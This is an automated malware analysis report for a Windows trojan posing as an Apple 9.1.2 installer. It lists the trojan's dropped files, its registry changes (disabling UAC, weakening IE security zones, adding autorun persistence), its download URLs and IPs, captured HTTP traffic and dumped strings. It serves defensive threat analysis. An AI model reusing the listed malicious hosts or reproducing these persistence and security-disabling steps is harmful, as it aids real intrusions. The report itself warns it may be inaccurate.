Trojan.Win32.VB.ctxv (Kaspersky), Trojan.Generic.12567452 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: caa9e435539539ab5f1379cc66fc2e5c
SHA1: 7bb1bb2599a88bee965e2f81c682a0382d79650d
SHA256: 456cd7e5281b43d0d45589abdc64c49fd21c008699d2b3b4cada0418545dfce2
SSDeep: 12288:MNIQAPGsAqY9IMVYd38sJdpQHlGlY8KfTLIPThlEg1rZonoSbMfU48iPGZhzwbpy:NPGSY91VwNJcFMqTLIPThlEg1rZonoSj
Size: 684667 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualCv71EXE, MicrosoftVisualCv70, UPolyXv05_v6
Company: Dummy, Ltd.
Created at: 2009-09-25 21:57:32
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
schtasks.exe:1300
schtasks.exe:580
wget.exe:1668
%original file name%.exe:1532
Charles.exe:452
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process wget.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\arsiv.exe (3733282 bytes)
The process %original file name%.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Charles.exe (3821 bytes)
The process Charles.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\king.js (196 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\key.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\update.txt (0 bytes)
Registry activity
The process schtasks.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 BC 0B 19 9E FD E8 A9 EC 81 4B 4B 27 96 80 07"
The process schtasks.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 5C 38 5F FE AC C3 D5 AC 76 BF F0 7E E1 12 3A"
The process wget.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 E4 22 23 D4 FC 83 45 6F 91 26 E7 99 30 AA 98"
The process %original file name%.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 9A 1C DB 27 4C 3D 1D 59 EB AC 1C CD 8D DC 44"
The process Charles.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Kingsoft]
"id_key" = "ceojbakbelhblkacoondeaabhglmaljj#MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5GQXVHGmSH/54uXHqn3P3Y3puRpkdxZXzHEfJ8X4DBnfsNcDBUsuPP9h5WEjIVFMPJcBhhQDPJxt6OPqd75deFXyR6DPtEeCpVkbj6cIH902ufevt JLDT/DwkmfJL9AYu57br gEWKFVqBhHqu6woVtgGcVDoy4ngJZ7OzZwDQIDAQAB"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 19 3F F3 CA B4 8A 5B CF 74 2C EF C0 49 BA 5B"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Google Charles" = "%Documents and Settings%\%current user%\Application Data\Charles.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
f98d5a7924143f6e687dd92d9af8f3a9 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\wget.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
schtasks.exe:1300
schtasks.exe:580
wget.exe:1668
%original file name%.exe:1532
Charles.exe:452 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\arsiv.exe (3733282 bytes)
%Documents and Settings%\%current user%\Application Data\Charles.exe (3821 bytes)
%Documents and Settings%\%current user%\Application Data\king.js (196 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Google Charles" = "%Documents and Settings%\%current user%\Application Data\Charles.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name: Apple Inc.
Product Name:
Product Version:
Legal Copyright: Apple Inc.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 9.1.2
File Description: Apple Inc. 9.1.2 Installation
Comments:
Language: Language Neutral
Company Name: Apple Inc.Product Name: Product Version: Legal Copyright: Apple Inc. Legal Trademarks: Original Filename: Internal Name: File Version: 9.1.2 File Description: Apple Inc. 9.1.2 Installation Comments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 362198 | 362496 | 4.62615 | 06fb96e5de678ab3654b8cba9be7b4b3 |
.rdata | 368640 | 42792 | 43008 | 3.73288 | a86a7956fff826cfae8192f9e4d6248d |
.data | 413696 | 31396 | 8192 | 2.70063 | f9f09007f34890bdde82a8b299b3f02b |
.rsrc | 446464 | 180224 | 178688 | 3.66951 | 0a554cf9f2a1fddeef1b4c7f8107f215 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://146.185.189.62/ahk/req.php?type=arsiv_hash | |
hxxp://146.185.189.62/ahk/req.php?type=arsiv_link | |
hxxp://178.62.177.241/app.exe | |
hxxp://www.filmverme.com:80/ahk/req.php?type=arsiv_link | |
hxxp://www.filmverme.com/ahk/req.php?type=arsiv_hash | |
hxxp://178.62.177.241:80/app.exe |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /app.exe HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: 178.62.177.241:80
Accept: */*
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Mar 2015 19:14:07 GMT
Content-Type: application/octet-stream
Content-Length: 31990778
Last-Modified: Fri, 13 Mar 2015 01:44:12 GMT
Connection: close
ETag: "550240ec-1e823fa"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........f..{5..{5..{5...5..{5..z5(.{5...5..{5...5..{5...5..{5...5..{5...5..{5...5..{5Rich..{5........PE..L...Yj>O.....................d...............0....@..................................................................K..3...L<...........@...........................2...............................................0...............................text...2........................... ..`.rdata..5....0......."..............@..@.data....V...P.......@..............@....CRT.................B..............@..@.rsrc....@.......B...D..............@..@..................................................................................................................................................................................................................................................................................................................................................................@s... s........................................D$..L$....L$.u..D$......S.....D$..d$....D$.....[...............WVS3..D$...}.G.T$.........D$..T$..D$...}.G.T$.........D$..T$...u..L$..D$.3......D$......A...L$..T$..D$...........u......d$....D$.....r.;T$.w.r.;D$.v.N3...Ou........[^_.........WVU3.3..D$...}.GE.T$.........D$..T$..D$...}.G.T$.........D$..T$...u(.L$..D$.3......D$........d$......d$....G...L$..T$..D$...........u......d$....D$.....r.;T$.w.r.;D$.v.N D$..T$.3. D$..T$.My..................Ou........]
<<< skipped >>>
GET /ahk/req.php?type=arsiv_link HTTP/1.0
User-Agent: Wget/1.5.3.1
Host: VVV.filmverme.com:80
Accept: */*
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sat, 14 Mar 2015 19:14:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.17
Location: hXXp://178.62.177.241/app.exe
GET /ahk/req.php?type=arsiv_hash HTTP/1.1
User-Agent: AutoHotkey
Host: VVV.filmverme.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Mar 2015 19:14:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
20..0c4950e06182df940d3e841551aa4378..0..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Charles.exe_452:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
YYu.Pj
YYu.Pj
!"#$%%&'())* ,-./0123456789:;
!"#$%%&'())* ,-./0123456789:;
VSSSh
VSSSh
E`SSh
E`SSh
SSSSSSSh
SSSSSSSh
urSSSh
urSSSh
WSSSh
WSSSh
zSSShX
zSSShX
t*SSh
t*SSh
t3SSSh
t3SSSh
VWumh0%F
VWumh0%F
u.hL%F
u.hL%F
It.It
It.It
SSSSh
SSSSh
tASSSh
tASSSh
udPS
udPS
uÊ;MP|
uÊ;MP|
!!!!!!""#$%&'(((((())* ,-.CCCCCCCC//C01234445656789:;9:;CCC?@AB
!!!!!!""#$%&'(((((())* ,-.CCCCCCCC//C01234445656789:;9:;CCC?@AB
AutoHotkey
AutoHotkey
AppsKey
AppsKey
ListHotkeys
ListHotkeys
KeyHistory
KeyHistory
DetectHiddenWindows
DetectHiddenWindows
SetKeyDelay
SetKeyDelay
Hotkey
Hotkey
KeyWait
KeyWait
GetKeyState
GetKeyState
URLDownloadToFile
URLDownloadToFile
MsgBox
MsgBox
IfMsgBox
IfMsgBox
AHK Keybd
AHK Keybd
X X
X X
NOTE: To disable the key history shown below, add the line "#KeyHistory 0" anywhere in the script. The same method can be used to change the size of the history buffer. For example: #KeyHistory 100 (Default is 40, Max is 500)
NOTE: To disable the key history shown below, add the line "#KeyHistory 0" anywhere in the script. The same method can be used to change the size of the history buffer. For example: #KeyHistory 100 (Default is 40, Max is 500)
The oldest are listed first. VK=Virtual Key, SC=Scan Code, Elapsed=Seconds since the previous event. Types: h=Hook Hotkey, s=Suppressed (blocked), i=Ignored because it was generated by an AHK script, a=Artificial, #=Disabled via #IfWinActive/Exist.
The oldest are listed first. VK=Virtual Key, SC=Scan Code, Elapsed=Seconds since the previous event. Types: h=Hook Hotkey, s=Suppressed (blocked), i=Ignored because it was generated by an AHK script, a=Artificial, #=Disabled via #IfWinActive/Exist.
NOTE: Only the script's own keyboard events are shown
NOTE: Only the script's own keyboard events are shown
(not the user's), because the keyboard hook isn't installed.
(not the user's), because the keyboard hook isn't installed.
Modifiers (Hook's Logical) = %s
Modifiers (Hook's Logical) = %s
Modifiers (Hook's Physical) = %s
Modifiers (Hook's Physical) = %s
Prefix key is down: %s
Prefix key is down: %s
OWarning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
OWarning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
"%s" is not a valid key name. The current thread will exit.
"%s" is not a valid key name. The current thread will exit.
"%s" is not allowed as a prefix key.
"%s" is not allowed as a prefix key.
%u hotkeys have been received in the last %ums.
%u hotkeys have been received in the last %ums.
(see #MaxHotkeysPerInterval in the help file)
(see #MaxHotkeysPerInterval in the help file)
Max hotkeys.
Max hotkeys.
The AltTab hotkey "%s" must have exactly one modifier/prefix.
The AltTab hotkey "%s" must have exactly one modifier/prefix.
The AltTab hotkey "%s" must specify which key (L or R).
The AltTab hotkey "%s" must specify which key (L or R).
Nonexistent hotkey variant (IfWin). The current thread will exit.
Nonexistent hotkey variant (IfWin). The current thread will exit.
Nonexistent hotkey. The current thread will exit.
Nonexistent hotkey. The current thread will exit.
SCx
SCx
A%s[%u of %u]: %-1.60s%s
A%s[%u of %u]: %-1.60s%s
: -*.|&^/
: -*.|&^/
HKEY_USERS
HKEY_USERS
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
%s\%s
%s\%s
=/|^,:*&~!() -"'\;`{}
=/|^,:*&~!() -"'\;`{}
timesincepriorhotkey
timesincepriorhotkey
timesincethishotkey
timesincethishotkey
priorhotkey
priorhotkey
thishotkey
thishotkey
subkey
subkey
keydelay
keydelay
detecthiddenwindows
detecthiddenwindows
%s%s%s
%s%s%s
if %s %s %s and %s
if %s %s %s and %s
%s%s %s %s
%s%s %s %s
MbP?u:
MbP?u:
%sGlobal Variables (alphabetical)%s
%sGlobal Variables (alphabetical)%s
Local Variables for %s()%s
Local Variables for %s()%s
Key History has been disabled via #KeyHistory 0.
Key History has been disabled via #KeyHistory 0.
Window: %s
Window: %s
Keybd hook: %s
Keybd hook: %s
Mouse hook: %s
Mouse hook: %s
Enabled Timers: %u of %u (%s)
Enabled Timers: %u of %u (%s)
Interrupted threads: %d%s
Interrupted threads: %d%s
Paused threads: %d of %d (%d layers)
Paused threads: %d of %d (%d layers)
Modifiers (GetKeyState() now) = %s
Modifiers (GetKeyState() now) = %s
AutoHotkey2
AutoHotkey2
%%%s%s%s
%%%s%s%s
Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after it is in parentheses to the right (if not 0). The bottommost line's elapsed time is the number of seconds since it executed.
Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after it is in parentheses to the right (if not 0). The bottommost line's elapsed time is the number of seconds since it executed.
Critical Error: %s
Critical Error: %s
Specifically: %-1.100s%s
Specifically: %-1.100s%s
%s%s: %-1.500s
%s%s: %-1.500s
in #include file "%s"
in #include file "%s"
Specifically: %s
Specifically: %s
%s (%d) : ==> %s
%s (%d) : ==> %s
Line Text: %-1.100s%s
Line Text: %-1.100s%s
Error at line %u
Error at line %u
Action: %s
Action: %s
Params:
Params:
Verb:
Verb:
.hta"
.hta"
.cmd"
.cmd"
.com"
.com"
.bat"
.bat"
.exe"
.exe"
%s %s
%s %s
System verbs unsupported with RunAs. The current thread will exit.
System verbs unsupported with RunAs. The current thread will exit.
#KeyHistory
#KeyHistory
#MaxThreadsPerHotkey
#MaxThreadsPerHotkey
#MaxHotkeysPerInterval
#MaxHotkeysPerInterval
#HotkeyInterval
#HotkeyInterval
#HotkeyModifierTimeout
#HotkeyModifierTimeout
#InstallKeybdHook
#InstallKeybdHook
=/|^,:*&~!() -
=/|^,:*&~!() -
Too many parameters passed to function.
Too many parameters passed to function.
Too few parameters passed to function.
Too few parameters passed to function.
Caller must pass a variable to this ByRef parameter.
Caller must pass a variable to this ByRef parameter.
/|^,*&~!. -"
/|^,*&~!. -"
Unsupported parameter default.
Unsupported parameter default.
=/|^,:*&~!()"
=/|^,:*&~!()"
"%s" requires that parameter #%u be non-blank.
"%s" requires that parameter #%u be non-blank.
"%s" requires at least %d parameter%s.
"%s" requires at least %d parameter%s.
Invalid hotkey.
Invalid hotkey.
=/|^,:*&~!() -".
=/|^,:*&~!() -".
Unsupported static initializer.
Unsupported static initializer.
Could not extract script from EXE.
Could not extract script from EXE.
Duplicate hotkey.
Duplicate hotkey.
Hotkeys/hotstrings are not allowed inside functions.
Hotkeys/hotstrings are not allowed inside functions.
{Blind}{%s Up}
{Blind}{%s Up}
*%s::
*%s::
*%s up::
*%s up::
{Blind}%s%s{%s DownTemp}
{Blind}%s%s{%s DownTemp}
if not GetKeyState("%s")
if not GetKeyState("%s")
Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.
Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.
=/|^,:
=/|^,:
=/|^,:. -*&!?~
=/|^,:. -*&!?~
Join
Join
>AUTOHOTKEY SCRIPT
>AUTOHOTKEY SCRIPT
EndKey:
EndKey:
SOFTWARE\AutoHotkey
SOFTWARE\AutoHotkey
\\.\%c:
\\.\%c:
\\.\vwin32
\\.\vwin32
open "%s" alias AHK_PlayMe
open "%s" alias AHK_PlayMe
All Files (*.*)
All Files (*.*)
Text Documents (*.txt)
Text Documents (*.txt)
*.txt
*.txt
%s%c%sÊll Files (*.*)%c*.*%c
%s%c%sÊll Files (*.*)%c*.*%c
Select File - %s
Select File - %s
1.0.48.05
1.0.48.05
\AutoHotkey.exe
\AutoHotkey.exe
WIN32_WINDOWS
WIN32_WINDOWS
.DEFAULT\Control Panel\Desktop\ResourceLocale
.DEFAULT\Control Panel\Desktop\ResourceLocale
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Compile error %d at offset %d: %s
Compile error %d at offset %d: %s
%sBottom
%sBottom
%sRight
%sRight
%sTop
%sTop
%sLeft
%sLeft
0xX
0xX
Could not open URL hXXp://VVV.autohotkey.com in default browser.
Could not open URL hXXp://VVV.autohotkey.com in default browser.
hXXp://VVV.autohotkey.com
hXXp://VVV.autohotkey.com
hh.exe
hh.exe
%sAutoHotkey.chm"
%sAutoHotkey.chm"
\AutoHotkey.chm"
\AutoHotkey.chm"
%sAU3_Spy.exe"
%sAU3_Spy.exe"
\AU3_Spy.exe"
\AU3_Spy.exe"
set cd door %s wait
set cd door %s wait
open %s type cdaudio alias cd wait shareable
open %s type cdaudio alias cd wait shareable
set cdaudio door %s wait
set cdaudio door %s wait
Component Doesn't Support This Control Type
Component Doesn't Support This Control Type
Mixer Doesn't Support This Component Type
Mixer Doesn't Support This Component Type
0xX
0xX
Mb@AAutoHotkey v1.0.48.05
Mb@AAutoHotkey v1.0.48.05
Len%d
Len%d
Pos%d
Pos%d
Len%s
Len%s
Pos%s
Pos%s
0.0.0.0
0.0.0.0
InternetOpenUrlA
InternetOpenUrlA
Select Folder - %s
Select Folder - %s
%u.%u.%u.%u
%u.%u.%u.%u
RunAs: Missing advapi32.dll. The current thread will exit.
RunAs: Missing advapi32.dll. The current thread will exit.
%dGui
%dGui
vkX
vkX
AutoHotkeyGUI
AutoHotkeyGUI
Password
Password
Report
Report
msctls_hotkey32
msctls_hotkey32
Button%s
Button%s
&Suspend Hotkeys
&Suspend Hotkeys
Supported only for the tray menu The current thread will exit.
Supported only for the tray menu The current thread will exit.
dddddd
dddddd
dA\\?\
dA\\?\
GdiplusShutdown
GdiplusShutdown
dd
dd
The following %s name contains an illegal character:
The following %s name contains an illegal character:
"%-1.300s"%s
"%-1.300s"%s
The maximum number of MsgBoxes has been reached.
The maximum number of MsgBoxes has been reached.
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
(*VERB) with an argument is not supported
mscoree.dll
mscoree.dll
- This application cannot run using the active version of the Microsoft .NET Runtime
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
Please contact the application's support team for more information.
GetProcessWindowStation
GetProcessWindowStation
user32.dll
user32.dll
internal state. The program cannot safely continue execution and must
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
continue execution and must now be terminated.
WSOCK32.dll
WSOCK32.dll
WINMM.dll
WINMM.dll
VERSION.dll
VERSION.dll
COMCTL32.dll
COMCTL32.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyboardLayout
GetKeyboardLayout
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
RegisterHotKey
RegisterHotKey
UnregisterHotKey
UnregisterHotKey
SetKeyboardState
SetKeyboardState
GetKeyboardState
GetKeyboardState
VkKeyScanExA
VkKeyScanExA
MapVirtualKeyA
MapVirtualKeyA
GetAsyncKeyState
GetAsyncKeyState
GetKeyNameTextA
GetKeyNameTextA
keybd_event
keybd_event
EnumChildWindows
EnumChildWindows
EnumWindows
EnumWindows
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
comdlg32.dll
comdlg32.dll
RegCloseKey
RegCloseKey
RegEnumKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExA
ShellExecuteExA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
GetCPInfo
GetCPInfo
-()[]{}:;'"/\,.?!
-()[]{}:;'"/\,.?!
zcÃ
zcÃ
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data\Charles.exe
%Documents and Settings%\%current user%\Application Data\Charles.exe
O.aMX
O.aMX
version="1.0.48.05"
version="1.0.48.05"
name="Microsoft.Windows.AutoHotkey"
name="Microsoft.Windows.AutoHotkey"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
&Lines most recently executed
&Lines most recently executed
&Hotkeys and their methods
&Hotkeys and their methods
&Key history and script info
&Key history and script info
&Web Site
&Web Site
Apple Inc. 9.1.2 Installation
Apple Inc. 9.1.2 Installation
9.1.2
9.1.2
arsiv.exe_1800:
.text
.text
`.rdata
`.rdata
@.data
@.data
@.rsrc
@.rsrc
^SShq
^SShq
%.*s(%d)%s
%.*s(%d)%s
COMCTL32.dll
COMCTL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
COMDLG32.dll
COMDLG32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHFileOperationW
SHFileOperationW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
WINRAR.SFX
WINRAR.SFX
d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
:(,4;;?@
:(,4;;?@
3,45657879
3,45657879
8888888888887
8888888888887
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
r%.*s(%d)%s
r%.*s(%d)%s
rtmp%d
rtmp%d
Shell.Explorer
Shell.Explorer
%s %s
%s %s
%s %s %s
%s %s %s
GETPASSWORD1
GETPASSWORD1
%s%s%d
%s%s%d
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
%s.%d.tmp
%s.%d.tmp
winrarsfxmappingfile.tmp
winrarsfxmappingfile.tmp
-el -s2 "-d%s" "-p%s" "-sp%s"
-el -s2 "-d%s" "-p%s" "-sp%s"
__tmp_rar_sfx_access_check_%u
__tmp_rar_sfx_access_check_%u
sfxcmd
sfxcmd
riched20.dll
riched20.dll
riched32.dll
riched32.dll
Dosyalar %s klas
Dosyalar %s klas
*%Documents and Settings%\%current user%\Application Data\arsiv.exe
*%Documents and Settings%\%current user%\Application Data\arsiv.exe
%Documents and Settings%\%current user%\Application Data\arsiv.exe
%Documents and Settings%\%current user%\Application Data\arsiv.exe
Enter password
Enter password
&Enter password for the encrypted file:
&Enter password for the encrypted file:
Extracting %s
Extracting %s
Skipping %s
Skipping %s
The file "%s" header is corrupt%The archive comment header is corrupt
The file "%s" header is corrupt%The archive comment header is corrupt
Unknown method in %s
Unknown method in %s
Cannot open %s
Cannot open %s
Cannot create %s
Cannot create %s
Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password.
Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password.
CRC failed in %s
CRC failed in %s
Packed data CRC failed in %s
Packed data CRC failed in %s
Wrong password for %s5Write error in the file %s. Probably the disk is full
Wrong password for %s5Write error in the file %s. Probably the disk is full
Read error in the file %s
Read error in the file %s
Extracting from %s
Extracting from %s
ErroraErrors encountered while performing the operation
ErroraErrors encountered while performing the operation
Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.
Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.
Extracting files to %s folder$Extracting files to temporary folder
Extracting files to %s folder$Extracting files to temporary folder
